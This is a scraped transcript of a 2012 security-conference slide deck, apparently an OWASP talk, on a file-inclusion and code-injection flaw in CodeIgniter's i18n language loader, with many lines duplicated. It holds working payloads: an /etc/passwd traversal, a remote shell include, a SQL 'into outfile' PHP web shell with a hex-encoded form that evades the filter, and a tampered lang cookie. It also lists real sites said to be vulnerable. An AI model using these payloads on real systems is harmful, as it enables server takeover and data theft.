codeigniter i18n security flaw
TRANSCRIPT
CodeIgniter i18n Code Injection
Abbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO [email protected] / [email protected]
Abbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO [email protected] / [email protected]
20 May 201220 May 2012
Understand the Context
PHP
• Mostly used SSI (75%)• 17 Years Maturity• Open Source Nature• Rapid Develop/Deploy• Secure Core• Insecure Libraries• Low Level Web Development *
PHP Frameworks
• PHP low level web support• Incorporation of Frameworks• Much Used and Mature -> Secure• Huge Codebase -> Insecure• Developers, not Security guys• Security-Oriented Frameworks (OWASP
ESAPI)
CodeIgniter
• Most used Mid-level Framework
Internationalization
• i18n importance today• Difficult implementation:
– File-based (Wordpress, eFront, …)– Database (jFramework)– Code-based (CodeIgniter, …)
• Obsolete consumers -> No testing
Remote File Inclusion
RFI at a glanceRFI at a glance
• 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion
• Not in Top Ten 2010 : Mostly Understood and Fixed
• Highest Impact (Run Arbitrary Code!)• Common on Interpreted Languages• Most Common in PHP (Why?)
• 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion
• Not in Top Ten 2010 : Mostly Understood and Fixed
• Highest Impact (Run Arbitrary Code!)• Common on Interpreted Languages• Most Common in PHP (Why?)
RFI Example<?php
$page = $_GET[‘page’];
include “./pages/{$page}.php”;
Malicious Input:
Mysite.com?page=../../../etc/passwd%00
Where current dir is /var/www
include “/var/www/pages/../../../etc/passwd”;
= include “/etc/passwd”; //show it on screen
<?php
$page = $_GET[‘page’];
include “./pages/{$page}.php”;
Malicious Input:
Mysite.com?page=../../../etc/passwd%00
Where current dir is /var/www
include “/var/www/pages/../../../etc/passwd”;
= include “/etc/passwd”; //show it on screen
RFI Cheatsheet
Use null character on input to terminate string:include “./{$page}.you.cant.rfi.me.php”;
Use absolute paths if input initiates include:include “{$_GET[‘page’]}”;
page=http://abx.ir/shell.txt%00
allow_url_include
If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL (via HTTP or other supported wrapper) instead of a local pathname.
e.g include “ftp://192.168.1.1/file.txt”;
If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL (via HTTP or other supported wrapper) instead of a local pathname.
e.g include “ftp://192.168.1.1/file.txt”;
Filter Parameters
• CodeIgniter has the least found exploits on all major PHP frameworks (Commercial Codebase)
• CodeIgniter filters dangerous characters such as ‘ , “, /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks.
• CodeIgniter has central module loader, and MVC pattern, preventing most RFIs.
Internationalization
• System/Core/ Lang.php:
function load($langfile = '', $idiom = '', $return = FALSE, $add_suffix = TRUE,
$alt_path = '')
{
$langfile = str_replace('.php', '', $langfile);
if ($add_suffix == TRUE)
{
$langfile = str_replace('_lang.', '', $langfile).'_lang';
}
$langfile .= '.php';
Internationalization (II)
if (file_exists($package_path.'language/'.$idiom.'/'.$langfile))
{
include($package_path.'language/'.$idiom.'/'.$langfile);
$found = TRUE;
break;
}
The $idiom is obtained from cookies as $_COOKIE[‘lang’]
$langfile is the domain keyword, e.g “sales”
Local File InclusionLocal File Inclusion
• Useful to extract info. from target system– /etc/passwd– ./config/database.php
• Easy to exploit
• Useful to extract info. from target system– /etc/passwd– ./config/database.php
• Easy to exploit
Local Code InclusionLocal Code Inclusion
• Requires a blind injection:– ‘ and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); ” into
outfile “/tmp/sales_lang.php” --
– CodeIgniter filters <? From input– ‘ and 1=0 union select
unhex(“3c3f706870206563686f207368656c6c5f6578656328245f52455155
4553545b715d29″) into outfile “/tmp/common_lang.php” --
– Caution: into outfile does not overwrite!– Where to find blind injection?
• Requires a blind injection:– ‘ and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); ” into
outfile “/tmp/sales_lang.php” --
– CodeIgniter filters <? From input– ‘ and 1=0 union select
unhex(“3c3f706870206563686f207368656c6c5f6578656328245f52455155
4553545b715d29″) into outfile “/tmp/common_lang.php” --
– Caution: into outfile does not overwrite!– Where to find blind injection?
Local Code Inclusion (II)Local Code Inclusion (II)
• Now change cookie from– a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A
%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad
– To lang%22%3Bs%3A2%3A%22../../../../../tmp
• Now change cookie from– a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A
%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad
– To lang%22%3Bs%3A2%3A%22../../../../../tmp
Remote Code InclusionRemote Code Inclusion
• Look at the code:include($package_path.'language/'.$idiom.'/'.$langfile);
• You a hacker? tell me how!
• Look at the code:include($package_path.'language/'.$idiom.'/'.$langfile);
• You a hacker? tell me how!
Remote Code Inclusion (II)Remote Code Inclusion (II)
$this->load->add_package_path()Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:
$this->load->add_package_path(APPPATH.'third_party/foo_bar/');
http://codeigniter.com/user_guide/libraries/loader.html
$this->load->add_package_path()Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:
$this->load->add_package_path(APPPATH.'third_party/foo_bar/');
http://codeigniter.com/user_guide/libraries/loader.html
DemonstrationDemonstration
CodeIgniter + i18n
• More than 240 sites discovered:– http://www.sedoparking.com– http://bambooinvoice.org/– http://www.haughin.com/– http://www.rapyd.com/– http://code-igniter.ru/
• And tons more…
• More than 240 sites discovered:– http://www.sedoparking.com– http://bambooinvoice.org/– http://www.haughin.com/– http://www.rapyd.com/– http://code-igniter.ru/
• And tons more…
Questions? Feedback?
Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
[email protected] / [email protected]
Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member